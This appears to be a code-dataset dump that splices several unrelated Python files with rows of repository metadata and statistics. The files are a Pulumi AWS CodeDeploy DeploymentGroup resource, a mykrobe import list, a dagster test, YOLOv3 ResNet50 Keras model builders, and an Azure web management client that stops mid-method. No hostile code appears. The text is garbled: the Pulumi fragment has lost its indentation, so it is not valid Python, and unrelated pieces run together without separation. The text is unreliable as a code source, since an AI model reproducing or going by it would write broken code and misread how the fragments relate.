* `targetGroupPairInfo` (`pulumi.Input[dict]`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`pulumi.Input[list]`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `testTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
The **on_premises_instance_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **trigger_configurations** object supports the following:
* `triggerEvents` (`pulumi.Input[list]`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`pulumi.Input[str]`) - The name of the notification trigger.
* `triggerTargetArn` (`pulumi.Input[str]`) - The ARN of the SNS topic through which notifications are sent.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/codedeploy_deployment_group.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['alarm_configuration'] = alarm_configuration
if app_name is None:
raise TypeError("Missing required property 'app_name'")
__props__['app_name'] = app_name
__props__['auto_rollback_configuration'] = auto_rollback_configuration
__props__['autoscaling_groups'] = autoscaling_groups
__props__['blue_green_deployment_config'] = blue_green_deployment_config
__props__['deployment_config_name'] = deployment_config_name
if deployment_group_name is None:
raise TypeError("Missing required property 'deployment_group_name'")
__props__['deployment_group_name'] = deployment_group_name
__props__['deployment_style'] = deployment_style
__props__['ec2_tag_filters'] = ec2_tag_filters
__props__['ec2_tag_sets'] = ec2_tag_sets
__props__['ecs_service'] = ecs_service
__props__['load_balancer_info'] = load_balancer_info
__props__['on_premises_instance_tag_filters'] = on_premises_instance_tag_filters
if service_role_arn is None:
raise TypeError("Missing required property 'service_role_arn'")
__props__['service_role_arn'] = service_role_arn
__props__['trigger_configurations'] = trigger_configurations
super(DeploymentGroup, __self__).__init__(
'aws:codedeploy/deploymentGroup:DeploymentGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, alarm_configuration=None, app_name=None, auto_rollback_configuration=None, autoscaling_groups=None, blue_green_deployment_config=None, deployment_config_name=None, deployment_group_name=None, deployment_style=None, ec2_tag_filters=None, ec2_tag_sets=None, ecs_service=None, load_balancer_info=None, on_premises_instance_tag_filters=None, service_role_arn=None, trigger_configurations=None):
"""
Get an existing DeploymentGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] alarm_configuration: Configuration block of alarms associated with the deployment group (documented below).
:param pulumi.Input[str] app_name: The name of the application.
:param pulumi.Input[dict] auto_rollback_configuration: Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
:param pulumi.Input[list] autoscaling_groups: Autoscaling groups associated with the deployment group.
:param pulumi.Input[dict] blue_green_deployment_config: Configuration block of the blue/green deployment options for a deployment group (documented below).
:param pulumi.Input[str] deployment_config_name: The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
:param pulumi.Input[str] deployment_group_name: The name of the deployment group.
:param pulumi.Input[dict] deployment_style: Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
:param pulumi.Input[list] ec2_tag_filters: Tag filters associated with the deployment group. See the AWS docs for details.
:param pulumi.Input[list] ec2_tag_sets: Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
:param pulumi.Input[dict] ecs_service: Configuration block(s) of the ECS services for a deployment group (documented below).
:param pulumi.Input[dict] load_balancer_info: Single configuration block of the load balancer to use in a blue/green deployment (documented below).
:param pulumi.Input[list] on_premises_instance_tag_filters: On premise tag filters associated with the group. See the AWS docs for details.
:param pulumi.Input[str] service_role_arn: The service role ARN that allows deployments.
:param pulumi.Input[list] trigger_configurations: Configuration block(s) of the triggers for the deployment group (documented below).
The **alarm_configuration** object supports the following:
* `alarms` (`pulumi.Input[list]`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `ignorePollAlarmFailure` (`pulumi.Input[bool]`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
The **auto_rollback_configuration** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`pulumi.Input[list]`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
The **blue_green_deployment_config** object supports the following:
* `deploymentReadyOption` (`pulumi.Input[dict]`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`pulumi.Input[str]`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`pulumi.Input[dict]`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`pulumi.Input[dict]`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
The **deployment_style** object supports the following:
* `deploymentOption` (`pulumi.Input[str]`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`pulumi.Input[str]`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
The **ec2_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ec2_tag_sets** object supports the following:
* `ec2_tag_filters` (`pulumi.Input[list]`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ecs_service** object supports the following:
* `clusterName` (`pulumi.Input[str]`) - The name of the ECS cluster.
* `serviceName` (`pulumi.Input[str]`) - The name of the ECS service.
The **load_balancer_info** object supports the following:
* `elbInfos` (`pulumi.Input[list]`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupInfos` (`pulumi.Input[list]`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupPairInfo` (`pulumi.Input[dict]`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`pulumi.Input[list]`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `testTrafficRoute` (`pulumi.Input[dict]`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`pulumi.Input[list]`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
The **on_premises_instance_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **trigger_configurations** object supports the following:
* `triggerEvents` (`pulumi.Input[list]`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`pulumi.Input[str]`) - The name of the notification trigger.
* `triggerTargetArn` (`pulumi.Input[str]`) - The ARN of the SNS topic through which notifications are sent.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/codedeploy_deployment_group.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["alarm_configuration"] = alarm_configuration
__props__["app_name"] = app_name
__props__["auto_rollback_configuration"] = auto_rollback_configuration
__props__["autoscaling_groups"] = autoscaling_groups
__props__["blue_green_deployment_config"] = blue_green_deployment_config
__props__["deployment_config_name"] = deployment_config_name
__props__["deployment_group_name"] = deployment_group_name
__props__["deployment_style"] = deployment_style
__props__["ec2_tag_filters"] = ec2_tag_filters
__props__["ec2_tag_sets"] = ec2_tag_sets
__props__["ecs_service"] = ecs_service
__props__["load_balancer_info"] = load_balancer_info
__props__["on_premises_instance_tag_filters"] = on_premises_instance_tag_filters
__props__["service_role_arn"] = service_role_arn
__props__["trigger_configurations"] = trigger_configurations
return DeploymentGroup(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 77.815217 | 489 | 0.70521 | 4,492 | 35,795 | 5.472395 | 0.079697 | 0.050118 | 0.028476 | 0.020747 | 0.917826 | 0.908917 | 0.906517 | 0.88817 | 0.874786 | 0.874786 | 0 | 0.001243 | 0.213494 | 35,795 | 459 | 490 | 77.984749 | 0.871914 | 0.564967 | 0 | 0.022472 | 1 | 0 | 0.176888 | 0.066111 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0.011236 | 0.067416 | 0.022472 | 0.325843 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f7c1156d431d369882f4e1783b15ccdeea28ae19 | 543 | py | Python | src/mykrobe/variants/__init__.py | chamilaadikaram/mykrobe | 2bcebf7b37f1c1416f397374da6ebfd02ce1aead | [
"MIT"
] | 1 | 2020-01-10T06:43:22.000Z | 2020-01-10T06:43:22.000Z | src/mykrobe/variants/__init__.py | chamilaadikaram/mykrobe | 2bcebf7b37f1c1416f397374da6ebfd02ce1aead | [
"MIT"
] | null | null | null | src/mykrobe/variants/__init__.py | chamilaadikaram/mykrobe | 2bcebf7b37f1c1416f397374da6ebfd02ce1aead | [
"MIT"
] | null | null | null | from mykrobe.variants.schema.models import VariantCallSet
from mykrobe.variants.schema.models import CallSet
from mykrobe.variants.schema.models import Call
from mykrobe.variants.schema.models import VariantCall
from mykrobe.variants.schema.models import SequenceCall
from mykrobe.variants.schema.models import Variant
from mykrobe.variants.schema.models import VariantSet
from mykrobe.variants.schema.models import VariantSetMetadata
from mykrobe.variants.schema.models import Reference
from mykrobe.variants.schema.models import ReferenceSet | 54.3 | 61 | 0.872928 | 70 | 543 | 6.771429 | 0.228571 | 0.232068 | 0.400844 | 0.527426 | 0.780591 | 0.780591 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071823 | 543 | 10 | 62 | 54.3 | 0.940476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7928262cae7dfd3af0700185d92469efd298a84b | 187 | py | Python | examples/docs_snippets/docs_snippets_tests/getting_started_tests/test_hello_world.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 1 | 2021-07-03T09:05:58.000Z | 2021-07-03T09:05:58.000Z | examples/docs_snippets/docs_snippets_tests/getting_started_tests/test_hello_world.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 1 | 2021-06-21T18:30:02.000Z | 2021-06-25T21:18:39.000Z | examples/docs_snippets/docs_snippets_tests/getting_started_tests/test_hello_world.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 1 | 2021-11-30T21:40:46.000Z | 2021-11-30T21:40:46.000Z | from dagster import execute_pipeline
from docs_snippets.getting_started.hello_world import hello_pipeline
def test_hello_pipeline():
assert execute_pipeline(hello_pipeline).success
| 26.714286 | 68 | 0.860963 | 25 | 187 | 6.08 | 0.6 | 0.256579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096257 | 187 | 6 | 69 | 31.166667 | 0.899408 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f70bb60cd9a165991bea09f982f2310be199ff23 | 4,891 | py | Python | yolo3/models/yolo3_resnet50.py | holajoa/keras-YOLOv3-model-set | c15b8a2f48371c063f6482b25593dc70d5956323 | [
"MIT"
] | 601 | 2019-08-24T10:14:52.000Z | 2022-03-29T15:05:33.000Z | yolo3/models/yolo3_resnet50.py | holajoa/keras-YOLOv3-model-set | c15b8a2f48371c063f6482b25593dc70d5956323 | [
"MIT"
] | 220 | 2019-10-04T18:57:59.000Z | 2022-03-31T15:30:37.000Z | yolo3/models/yolo3_resnet50.py | holajoa/keras-YOLOv3-model-set | c15b8a2f48371c063f6482b25593dc70d5956323 | [
"MIT"
] | 218 | 2019-10-31T03:32:11.000Z | 2022-03-25T14:44:19.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v3 ResNet50 Model Defined in Keras."""
from tensorflow.keras.layers import UpSampling2D, Concatenate
from tensorflow.keras.models import Model
from tensorflow.keras.applications.resnet import ResNet50
from yolo3.models.layers import yolo3_predictions, yolo3lite_predictions, tiny_yolo3_predictions, tiny_yolo3lite_predictions
def yolo3_resnet50_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 ResNet50 model CNN body in Keras."""
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
# f3 : 52 x 52 x 512
f3 = resnet50.get_layer('conv3_block4_out').output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs = inputs, outputs=[y1,y2,y3])
def yolo3lite_resnet50_body(inputs, num_anchors, num_classes):
'''Create YOLO_v3 Lite ResNet50 model CNN body in keras.'''
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
# f3 : 52 x 52 x 512
f3 = resnet50.get_layer('conv3_block4_out').output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs = inputs, outputs=[y1,y2,y3])
def yolo3lite_spp_resnet50_body(inputs, num_anchors, num_classes):
'''Create YOLO_v3 Lite SPP ResNet50 model CNN body in keras.'''
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
# f3 : 52 x 52 x 512
f3 = resnet50.get_layer('conv3_block4_out').output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes, use_spp=True)
return Model(inputs = inputs, outputs=[y1,y2,y3])
def tiny_yolo3_resnet50_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 ResNet50 model CNN body in keras.'''
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
f1_channel_num = 1024
f2_channel_num = 512
y1, y2 = tiny_yolo3_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes)
return Model(inputs, [y1,y2])
def tiny_yolo3lite_resnet50_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 Lite ResNet50 model CNN body in keras.'''
resnet50 = ResNet50(input_tensor=inputs, weights='imagenet', include_top=False)
print('backbone layers number: {}'.format(len(resnet50.layers)))
# input: 416 x 416 x 3
# conv5_block3_out: 13 x 13 x 2048
# conv4_block6_out: 26 x 26 x 1024
# conv3_block4_out: 52 x 52 x 512
# f1 :13 x 13 x 2048
f1 = resnet50.get_layer('conv5_block3_out').output
# f2: 26 x 26 x 1024
f2 = resnet50.get_layer('conv4_block6_out').output
f1_channel_num = 1024
f2_channel_num = 512
y1, y2 = tiny_yolo3lite_predictions((f1, f2), (f1_channel_num, f2_channel_num), num_anchors, num_classes)
return Model(inputs, [y1,y2])
| 36.22963 | 143 | 0.686363 | 756 | 4,891 | 4.19709 | 0.10582 | 0.081941 | 0.065553 | 0.063032 | 0.887803 | 0.887803 | 0.887803 | 0.887803 | 0.887803 | 0.869524 | 0 | 0.141781 | 0.212635 | 4,891 | 134 | 144 | 36.5 | 0.68216 | 0.245349 | 0 | 0.745455 | 0 | 0 | 0.108278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.072727 | 0 | 0.254545 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f731fb11331a48d87e7ec2442b5be6c0a5ed4a52 | 34,160 | py | Python | azure-mgmt-web/azure/mgmt/web/operations/global_model_operations.py | HydAu/AzureSDKForPython | 5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3 | [
"Apache-2.0"
] | null | null | null | azure-mgmt-web/azure/mgmt/web/operations/global_model_operations.py | HydAu/AzureSDKForPython | 5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3 | [
"Apache-2.0"
] | null | null | null | azure-mgmt-web/azure/mgmt/web/operations/global_model_operations.py | HydAu/AzureSDKForPython | 5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class GlobalModelOperations(object):
"""GlobalModelOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_subscription_publishing_credentials(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets publishing credentials for the subscription owner
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`User <azure.mgmt.web.models.User>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/publishingCredentials'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('User', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_subscription_publishing_credentials(
self, request_message, custom_headers=None, raw=False, **operation_config):
"""
Updates publishing credentials for the subscription owner
:param request_message: requestMessage with new publishing credentials
:type request_message: :class:`User <azure.mgmt.web.models.User>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`User <azure.mgmt.web.models.User>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/publishingCredentials'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(request_message, 'User')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('User', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_subscription_geo_regions(
self, sku=None, custom_headers=None, raw=False, **operation_config):
"""
Gets list of available geo regions
:param sku: Filter only to regions that support this sku
:type sku: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`GeoRegionCollection
<azure.mgmt.web.models.GeoRegionCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/geoRegions'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if sku is not None:
query_parameters['sku'] = self._serialize.query("sku", sku, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GeoRegionCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_certificates(
self, custom_headers=None, raw=False, **operation_config):
"""
Get all certificates for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateCollection
<azure.mgmt.web.models.CertificateCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/certificates'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
